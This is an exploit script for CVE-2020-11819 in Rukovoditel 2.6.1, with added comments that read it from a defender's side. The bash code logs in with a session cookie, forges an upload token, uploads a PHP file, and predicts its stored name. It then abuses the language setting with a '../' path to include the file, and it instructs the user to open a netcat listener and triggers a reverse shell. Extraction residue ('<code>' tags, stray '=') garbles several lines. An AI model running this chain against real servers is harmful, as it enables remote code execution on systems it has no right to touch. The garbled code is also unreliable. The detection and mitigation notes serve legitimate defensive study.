# Exploit Title: Rukovoditel 2.6.1 - RCE
# Date: 2020-06-11
# Exploit Author: coiffeur
# Write Up: https://therealcoiffeur.github.io/c1010
# Vendor Homepage: https://www.rukovoditel.net/
# Software Link: https://www.rukovoditel.net/download.php
# Version: v2.6.1
# CVE: CVE-2020-11819
#
# Review summary (defender's reading of the listing below):
#   Post-authentication chain: every request carries an existing session
#   cookie (SID), so a valid logged-in session is a precondition. The chain
#   is (1) derive the account's upload token from values the client already
#   knows, (2) upload a PHP file through the attachments endpoint, (3) predict
#   the stored filename from the server's clock, (4) point the account's
#   language setting at that file so the application includes it.
#   Each step maps to a distinct missing control (see per-step comments).
#   The payload test.php is not part of this listing.
#
# Detection: all four steps are visible in web server access logs for the
#   account module: attachments_upload with a .php Filedata part, an
#   action=update whose fields[13] contains "../", then a fetch of
#   module=users/account from the same session.
#
# NOTE(review): the "<code>"/"</code>" tags and stray "=" / "=20" sequences
#   look like HTML and quoted-printable residue from extraction (backticks
#   presumably stood where "<code>" appears); they are left as found and the
#   listing does not run as written.

# -e: abort on the first failing command. Note that the curl calls in the
# pipelines below are not individually checked, so a failed request yields an
# empty variable rather than an abort.
set -e

#######################################
# Print usage and exit.
# Globals:   none
# Arguments: none
# Outputs:   usage text to stdout
# Returns:   exits the script; note the bare `exit` returns status 0 even
#            though this is reached on a usage error (stderr + non-zero would
#            be conventional)
#######################################
function usage () {
  echo "NAME: Rukovoditel v2.6.1, RCE"
  echo "SYNOPSIS: ./rce_2.6.1.sh <BASE_URL> <SID>"
  echo "DESCRIPTION:"
  echo "Upload file test.php on the remote server and trigger the file using a LFI"
  echo "AUTHOR: coiffeur"
  exit
}

if [ "$#" -ne 2 ]; then
  usage
fi

# $1: base URL of the target application; $2: session cookie value (sid).
BASE_URL=$1
SID=$2
echo "Setting target: $BASE_URL"
echo "Setting sid: $SID"
echo ""

# Step 1a: the numeric account id is scraped from the account page
# ("validate_form&id=<n>"), i.e. it is disclosed to the logged-in user.
echo "Extracting \$app_user['id']:"
APP_USER_ID=<code>curl -s "$BASE_URL/index.php?module=users/account" -H "Cookie: sid=$SID" | grep "validate_form&id=" | cut -d '=' -f 3 | cut -d "'" -f 1
echo "=>\$app_user['id']: $APP_USER_ID"

# Step 1b: the timestamp is a client-chosen POST field; any value works
# because the server only checks that the token matches it.
echo "Setting arbitrary \$_POST['timestamp']:"
TIMESTAMP=1337
echo "=>\$_POST['timestamp']: 1337"

# Step 1c: token = md5(user_id . timestamp). A token built solely from values
# the client controls or can read authenticates nothing; the control that
# closes this step is binding the token to a server-side secret and to the
# session (e.g. an HMAC over the session id), never to client-supplied input.
echo "Calculating \$verifyToken:"
VERIFY_TOKEN=<code>echo -n "$APP_USER_ID$TIMESTAMP" | md5sum | cut -d ' ' -f 1=
echo "=>\$verifyToken: $VERIFY_TOKEN"
echo ""

# Step 2: the attachments endpoint accepts a ".php" upload. The missing
# control is a server-side extension/MIME allowlist plus storing attachments
# outside the web root (or in a location where the web server does not
# execute scripts).
echo "[*] Trying to upload test.php ... (Arbitrary File Upload)"
curl "$BASE_URL/index.php?module=users/account&action=attachments_upload" -H "Cookie: sid=$SID" -F "timestamp=$TIMESTAMP" -F "token=$VERIFY_TOKEN" -F 'Filedata=@test.php'
echo ""

# Step 3a: the server's clock is read from the HTTP Date response header;
# the stored name is derived from time(), so the upload and this read are
# assumed to land in the same second (a race the script does not retry).
echo "[*] Trying to recover time() output:"
TIME=$(date -d "<code>curl -si "$BASE_URL" | grep "Date:" | sed 's/Date: //'</code>"= +%s)
echo "=>timestamp: $TIME"

# Step 3b: stored name = sha1(time . "_" . original name). Predictable naming
# lets the path be reconstructed without any directory listing; an
# unpredictable name only raises the bar here, since step 4 includes whatever
# path the attacker supplies — the allowlist in step 2 is the real control.
# Style: $TIME is unquoted (SC2086) and `echo -n` is non-portable;
# printf '%s' "$TIME" would be the conventional form.
echo "[*] Trying to recover the generated filename:"=20
FILENAME=<code> echo -n $TIME"_test.php" | sha1sum | cut -d ' ' -f 1
echo "=>filename: $FILENAME"

# Step 3c: attachments are stored under a date-based directory, so the
# client's local date is assumed to match the server's (time-zone dependent).
echo "[*] Trying to reconstructing full path:"
DATE=<code>date +"%Y/%m/%d"
FULL_PATH=<code>echo -n "uploads/attachments/$DATE/$FILENAME"
echo "=>full path: $FULL_PATH"
echo ""
echo "[!] Prepare a netcat listener by typing: nc -lvp 4444"
echo ""

# Step 4: the account's language preference (fields[13]) is stored as a
# relative path and later included by the account page. Validating that
# setting against an allowlist of known language files (rather than
# accepting an arbitrary path containing "../") closes the inclusion.
echo "[*] Trying to update language settings... 
(Local File Inclusion)"
LANGUAGE="../../$FULL_PATH"
curl -s "$BASE_URL/index.php?module=users/account&action=update" -H "Cookie: sid=$SID" -d "fields[13]=$LANGUAGE"

# Loading the account page makes the application include the stored path.
# NOTE(review): the cookie value here is "$SID=" (trailing "=") — presumably
# extraction residue rather than intent; the other requests send "$SID".
echo "[*] Triggering reverse shell ..."
curl -s "$BASE_URL/index.php?module=users/account" -H "Cookie: sid=$SID="

# Cleanup: the language setting is reset to the default, which also removes
# the most obvious persisted indicator; the uploaded file itself is not removed.
echo "[*] Restoring default language settings"
curl -s "$BASE_URL/index.php?module=users/account&action=update" -H "Cookie: sid=$SID" -d "fields[13]=english.php"
echo "> Done"